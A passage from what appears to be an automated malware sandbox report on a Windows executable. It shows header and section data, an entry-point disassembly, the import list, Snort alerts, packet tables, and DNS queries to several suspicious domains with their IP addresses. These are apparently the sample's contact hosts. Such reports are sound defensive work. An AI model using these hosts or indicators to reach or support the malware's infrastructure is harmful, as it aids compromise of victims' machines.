                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                  Import Hash:7c2c71dfce9a27650634dc8b1ca03bf0

                                                                                                                                  Entrypoint Preview

                                                                                                                                  Instruction
                                                                                                                                  sub esp, 00000184h
                                                                                                                                  push ebx
                                                                                                                                  push esi
                                                                                                                                  push edi
                                                                                                                                  xor ebx, ebx
                                                                                                                                  push 00008001h
                                                                                                                                  mov dword ptr [esp+18h], ebx
                                                                                                                                  mov dword ptr [esp+10h], 0040A130h
                                                                                                                                  mov dword ptr [esp+20h], ebx
                                                                                                                                  mov byte ptr [esp+14h], 00000020h
                                                                                                                                  call dword ptr [004080A8h]
                                                                                                                                  call dword ptr [004080A4h]
                                                                                                                                  and eax, BFFFFFFFh
                                                                                                                                  cmp ax, 00000006h
                                                                                                                                  mov dword ptr [0042F42Ch], eax
                                                                                                                                  je 00007F43E0572AA3h
                                                                                                                                  push ebx
                                                                                                                                  call 00007F43E0575BA3h
                                                                                                                                  cmp eax, ebx
                                                                                                                                  je 00007F43E0572A99h
                                                                                                                                  push 00000C00h
                                                                                                                                  call eax
                                                                                                                                  mov esi, 00408298h
                                                                                                                                  push esi
                                                                                                                                  call 00007F43E0575B1Fh
                                                                                                                                  push esi
                                                                                                                                  call dword ptr [004080A0h]
                                                                                                                                  lea esi, dword ptr [esi+eax+01h]
                                                                                                                                  cmp byte ptr [esi], bl
                                                                                                                                  jne 00007F43E0572A7Dh
                                                                                                                                  push 0000000Ah
                                                                                                                                  call 00007F43E0575B77h
                                                                                                                                  push 00000008h
                                                                                                                                  call 00007F43E0575B70h
                                                                                                                                  push 00000006h
                                                                                                                                  mov dword ptr [0042F424h], eax
                                                                                                                                  call 00007F43E0575B64h
                                                                                                                                  cmp eax, ebx
                                                                                                                                  je 00007F43E0572AA1h
                                                                                                                                  push 0000001Eh
                                                                                                                                  call eax
                                                                                                                                  test eax, eax
                                                                                                                                  je 00007F43E0572A99h
                                                                                                                                  or byte ptr [0042F42Fh], 00000040h
                                                                                                                                  push ebp
                                                                                                                                  call dword ptr [00408040h]
                                                                                                                                  push ebx
                                                                                                                                  call dword ptr [00408284h]
                                                                                                                                  mov dword ptr [0042F4F8h], eax
                                                                                                                                  push ebx
                                                                                                                                  lea eax, dword ptr [esp+38h]
                                                                                                                                  push 00000160h
                                                                                                                                  push eax
                                                                                                                                  push ebx
                                                                                                                                  push 00429858h
                                                                                                                                  call dword ptr [00408178h]
                                                                                                                                  push 0040A1ECh

                                                                                                                                  Rich Headers

                                                                                                                                  Programming Language:
                                                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                  Data Directories

                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x853c0xa0.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3f0000x4340.rsrc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x294.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                  Sections

                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                  .text0x10000x64550x6600False0.667356004902data6.43794179006IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                  .rdata0x80000x134a0x1400False0.459765625data5.23641914595IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  .data0xa0000x255380x600False0.461588541667data4.12893654735IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                  .ndata0x300000xf0000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  .rsrc0x3f0000x43400x4400False0.12890625data2.33445296823IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                  Resources

                                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                                  RT_ICON0x3f3100x10a8dataEnglishUnited States
                                                                                                                                  RT_ICON0x403b80xea8GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                  RT_ICON0x412600x8a8dataEnglishUnited States
                                                                                                                                  RT_ICON0x41b080x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                  RT_ICON0x420700x468dataEnglishUnited States
                                                                                                                                  RT_ICON0x424d80x2e8dataEnglishUnited States
                                                                                                                                  RT_ICON0x427c00x128dataEnglishUnited States
                                                                                                                                  RT_DIALOG0x428e80xb4dataEnglishUnited States
                                                                                                                                  RT_DIALOG0x429a00x120dataEnglishUnited States
                                                                                                                                  RT_DIALOG0x42ac00x202dataEnglishUnited States
                                                                                                                                  RT_DIALOG0x42cc80xf8dataEnglishUnited States
                                                                                                                                  RT_DIALOG0x42dc00xeedataEnglishUnited States
                                                                                                                                  RT_GROUP_ICON0x42eb00x68dataEnglishUnited States
                                                                                                                                  RT_MANIFEST0x42f180x423XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                                  Imports

                                                                                                                                  DLLImport
                                                                                                                                  KERNEL32.dllSetEnvironmentVariableA, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetCurrentProcess, CopyFileA, Sleep, GetTickCount, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, SetFileAttributesA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileTime, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CloseHandle, lstrcmpiA, GlobalUnlock, GetDiskFreeSpaceA, lstrcmpA, DeleteFileA, FindFirstFileA, FindNextFileA, FindClose, SetFilePointer, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, MultiByteToWideChar, FreeLibrary, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
                                                                                                                                  USER32.dllGetSystemMenu, SetClassLongA, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, LoadImageA, CreateDialogParamA, SetTimer, SetWindowTextA, SetForegroundWindow, ShowWindow, SetWindowLongA, SendMessageTimeoutA, FindWindowExA, IsWindow, AppendMenuA, TrackPopupMenu, CreatePopupMenu, DrawTextA, EndPaint, DestroyWindow, wsprintfA, PostQuitMessage
                                                                                                                                  GDI32.dllSelectObject, SetTextColor, SetBkMode, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, GetDeviceCaps, SetBkColor
                                                                                                                                  SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
                                                                                                                                  ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                                                  COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                  ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                                                  Possible Origin

                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                  EnglishUnited States

                                                                                                                                  Network Behavior

                                                                                                                                  Snort IDS Alerts

                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                  11/26/20-15:08:39.139293TCP1201ATTACK-RESPONSES 403 Forbidden804976634.102.136.180192.168.2.4
                                                                                                                                  11/26/20-15:08:44.471838TCP1201ATTACK-RESPONSES 403 Forbidden804976734.102.136.180192.168.2.4
                                                                                                                                  11/26/20-15:08:55.246997TCP1201ATTACK-RESPONSES 403 Forbidden804976975.126.100.11192.168.2.4
                                                                                                                                  11/26/20-15:09:05.767720TCP1201ATTACK-RESPONSES 403 Forbidden804977134.102.136.180192.168.2.4

                                                                                                                                  Network Port Distribution

                                                                                                                                  TCP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Nov 26, 2020 15:08:23.735517979 CET4976480192.168.2.4192.0.78.24
                                                                                                                                  Nov 26, 2020 15:08:23.752428055 CET8049764192.0.78.24192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:23.752602100 CET4976480192.168.2.4192.0.78.24
                                                                                                                                  Nov 26, 2020 15:08:23.752765894 CET4976480192.168.2.4192.0.78.24
                                                                                                                                  Nov 26, 2020 15:08:23.768997908 CET8049764192.0.78.24192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:23.769018888 CET8049764192.0.78.24192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:23.769026995 CET8049764192.0.78.24192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:23.769195080 CET4976480192.168.2.4192.0.78.24
                                                                                                                                  Nov 26, 2020 15:08:23.769305944 CET4976480192.168.2.4192.0.78.24
                                                                                                                                  Nov 26, 2020 15:08:23.787704945 CET8049764192.0.78.24192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:28.827683926 CET4976580192.168.2.4192.0.78.24
                                                                                                                                  Nov 26, 2020 15:08:28.844005108 CET8049765192.0.78.24192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:28.844106913 CET4976580192.168.2.4192.0.78.24
                                                                                                                                  Nov 26, 2020 15:08:28.844275951 CET4976580192.168.2.4192.0.78.24
                                                                                                                                  Nov 26, 2020 15:08:28.860564947 CET8049765192.0.78.24192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:28.860582113 CET8049765192.0.78.24192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:28.860589981 CET8049765192.0.78.24192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:28.860757113 CET4976580192.168.2.4192.0.78.24
                                                                                                                                  Nov 26, 2020 15:08:28.860820055 CET4976580192.168.2.4192.0.78.24
                                                                                                                                  Nov 26, 2020 15:08:28.877034903 CET8049765192.0.78.24192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:39.007757902 CET4976680192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:08:39.023983002 CET804976634.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:39.024090052 CET4976680192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:08:39.024245024 CET4976680192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:08:39.040355921 CET804976634.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:39.139292955 CET804976634.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:39.139324903 CET804976634.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:39.139566898 CET4976680192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:08:39.139718056 CET4976680192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:08:39.155819893 CET804976634.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:44.339562893 CET4976780192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:08:44.356126070 CET804976734.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:44.356231928 CET4976780192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:08:44.356384993 CET4976780192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:08:44.372896910 CET804976734.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:44.471837997 CET804976734.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:44.471859932 CET804976734.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:44.472093105 CET4976780192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:08:44.472237110 CET4976780192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:08:44.488727093 CET804976734.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:49.534532070 CET4976880192.168.2.423.88.85.105
                                                                                                                                  Nov 26, 2020 15:08:49.701931953 CET804976823.88.85.105192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:49.702104092 CET4976880192.168.2.423.88.85.105
                                                                                                                                  Nov 26, 2020 15:08:49.702579021 CET4976880192.168.2.423.88.85.105
                                                                                                                                  Nov 26, 2020 15:08:49.871308088 CET804976823.88.85.105192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:49.871728897 CET4976880192.168.2.423.88.85.105
                                                                                                                                  Nov 26, 2020 15:08:49.871788025 CET4976880192.168.2.423.88.85.105
                                                                                                                                  Nov 26, 2020 15:08:50.039123058 CET804976823.88.85.105192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:54.974551916 CET4976980192.168.2.475.126.100.11
                                                                                                                                  Nov 26, 2020 15:08:55.110631943 CET804976975.126.100.11192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:55.110913992 CET4976980192.168.2.475.126.100.11
                                                                                                                                  Nov 26, 2020 15:08:55.111057997 CET4976980192.168.2.475.126.100.11
                                                                                                                                  Nov 26, 2020 15:08:55.246968985 CET804976975.126.100.11192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:55.246997118 CET804976975.126.100.11192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:55.247005939 CET804976975.126.100.11192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:55.247483969 CET4976980192.168.2.475.126.100.11
                                                                                                                                  Nov 26, 2020 15:08:55.383516073 CET804976975.126.100.11192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:00.310724974 CET4977080192.168.2.495.215.210.10
                                                                                                                                  Nov 26, 2020 15:09:00.427397013 CET804977095.215.210.10192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:00.427512884 CET4977080192.168.2.495.215.210.10
                                                                                                                                  Nov 26, 2020 15:09:00.427666903 CET4977080192.168.2.495.215.210.10
                                                                                                                                  Nov 26, 2020 15:09:00.543589115 CET804977095.215.210.10192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:00.543806076 CET804977095.215.210.10192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:00.543859005 CET804977095.215.210.10192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:00.543992996 CET4977080192.168.2.495.215.210.10
                                                                                                                                  Nov 26, 2020 15:09:00.544039965 CET4977080192.168.2.495.215.210.10
                                                                                                                                  Nov 26, 2020 15:09:00.659297943 CET804977095.215.210.10192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:05.636172056 CET4977180192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:09:05.652481079 CET804977134.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:05.652625084 CET4977180192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:09:05.652915001 CET4977180192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:09:05.669075966 CET804977134.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:05.767719984 CET804977134.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:05.767754078 CET804977134.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:05.767883062 CET4977180192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:09:05.767950058 CET4977180192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:09:05.785839081 CET804977134.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:10.998608112 CET4977280192.168.2.4165.227.229.15
                                                                                                                                  Nov 26, 2020 15:09:11.026669025 CET8049772165.227.229.15192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:11.026842117 CET4977280192.168.2.4165.227.229.15
                                                                                                                                  Nov 26, 2020 15:09:11.027050972 CET4977280192.168.2.4165.227.229.15
                                                                                                                                  Nov 26, 2020 15:09:11.054827929 CET8049772165.227.229.15192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:11.522761106 CET4977280192.168.2.4165.227.229.15
                                                                                                                                  Nov 26, 2020 15:09:11.589823961 CET8049772165.227.229.15192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:13.298913956 CET8049772165.227.229.15192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:13.299211025 CET4977280192.168.2.4165.227.229.15
                                                                                                                                  Nov 26, 2020 15:09:13.315665007 CET8049772165.227.229.15192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:13.315711975 CET8049772165.227.229.15192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:13.315924883 CET4977280192.168.2.4165.227.229.15
                                                                                                                                  Nov 26, 2020 15:09:13.316107035 CET4977280192.168.2.4165.227.229.15

                                                                                                                                  UDP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Nov 26, 2020 15:07:13.144359112 CET5299153192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:13.171447039 CET53529918.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:14.239559889 CET5370053192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:14.266622066 CET53537008.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:21.541554928 CET5172653192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:21.587124109 CET53517268.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:22.348275900 CET5679453192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:22.375363111 CET53567948.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:26.132932901 CET5653453192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:26.160192966 CET53565348.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:26.973536015 CET5662753192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:27.000674963 CET53566278.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:27.773952007 CET5662153192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:27.800987005 CET53566218.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:28.831362963 CET6311653192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:28.876629114 CET53631168.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:30.165488005 CET6407853192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:30.192444086 CET53640788.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:30.963388920 CET6480153192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:30.990685940 CET53648018.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:31.495783091 CET6172153192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:31.522849083 CET53617218.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:31.801719904 CET5125553192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:31.828955889 CET53512558.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:32.467648983 CET6152253192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:32.494673014 CET53615228.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:40.357604027 CET5233753192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:40.384687901 CET53523378.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:42.293867111 CET5504653192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:42.320950031 CET53550468.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:49.923564911 CET4961253192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:49.950719118 CET53496128.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:51.235740900 CET4928553192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:51.281332016 CET53492858.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:51.810421944 CET5060153192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:51.855747938 CET53506018.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:52.990712881 CET6087553192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:53.036309004 CET53608758.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:53.056974888 CET5644853192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:53.084016085 CET53564488.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:53.981822014 CET5917253192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:54.028368950 CET53591728.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:54.887774944 CET6242053192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:54.914705038 CET53624208.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:55.792689085 CET6057953192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:55.837688923 CET53605798.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:56.405735016 CET5018353192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:56.450957060 CET53501838.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:57.158721924 CET6153153192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:57.204114914 CET53615318.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:57.212976933 CET4922853192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:57.258393049 CET53492288.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:57.801665068 CET5979453192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:57.828541994 CET53597948.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:58.288177013 CET5591653192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:58.333524942 CET53559168.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:09.319849968 CET5275253192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:08:09.346962929 CET53527528.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:09.402966022 CET6054253192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:08:09.430198908 CET53605428.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:23.667031050 CET6068953192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:08:23.724678993 CET53606898.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:28.776492119 CET6420653192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:08:28.826474905 CET53642068.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:33.867263079 CET5090453192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:08:33.917606115 CET53509048.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:38.957355022 CET5752553192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:08:39.006593943 CET53575258.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:44.277055979 CET5381453192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:08:44.338299990 CET53538148.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:49.482791901 CET5341853192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:08:49.533351898 CET53534188.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:54.903394938 CET6283353192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:08:54.973221064 CET53628338.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:00.259206057 CET5926053192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:09:00.309253931 CET53592608.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:05.562294960 CET4994453192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:09:05.633838892 CET53499448.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:10.801733971 CET6330053192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:09:10.996421099 CET53633008.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:16.539433002 CET6144953192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:09:16.707619905 CET53614498.8.8.8192.168.2.4

                                                                                                                                  DNS Queries

                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                  Nov 26, 2020 15:08:23.667031050 CET192.168.2.48.8.8.80xa1d5Standard query (0)www.carnesveymacr.comA (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:28.776492119 CET192.168.2.48.8.8.80x3f4bStandard query (0)www.mehler.photographyA (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:33.867263079 CET192.168.2.48.8.8.80xb2aStandard query (0)www.uyieoamejus2zd.comA (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:38.957355022 CET192.168.2.48.8.8.80xef12Standard query (0)www.thelonerangernews.comA (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:44.277055979 CET192.168.2.48.8.8.80xeae2Standard query (0)www.hvcharging.comA (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:49.482791901 CET192.168.2.48.8.8.80x2278Standard query (0)www.jddq888.comA (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:54.903394938 CET192.168.2.48.8.8.80x2c83Standard query (0)www.wtmailer15.comA (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:00.259206057 CET192.168.2.48.8.8.80x8642Standard query (0)www.wastie.clubA (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:05.562294960 CET192.168.2.48.8.8.80x460cStandard query (0)www.gettingthehelloutofca.comA (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:10.801733971 CET192.168.2.48.8.8.80x26fcStandard query (0)www.caelaabadie.comA (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:16.539433002 CET192.168.2.48.8.8.80xc857Standard query (0)www.mapnimbis.comA (IP address)IN (0x0001)

                                                                                                                                  DNS Answers

                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                  Nov 26, 2020 15:08:23.724678993 CET8.8.8.8192.168.2.40xa1d5No error (0)www.carnesveymacr.comcarnesveymacr.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:23.724678993 CET8.8.8.8192.168.2.40xa1d5No error (0)carnesveymacr.com192.0.78.24A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:23.724678993 CET8.8.8.8192.168.2.40xa1d5No error (0)carnesveymacr.com192.0.78.25A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:28.826474905 CET8.8.8.8192.168.2.40x3f4bNo error (0)www.mehler.photographymehler.photographyCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:28.826474905 CET8.8.8.8192.168.2.40x3f4bNo error (0)mehler.photography192.0.78.24A (IP address)IN (0x0001)
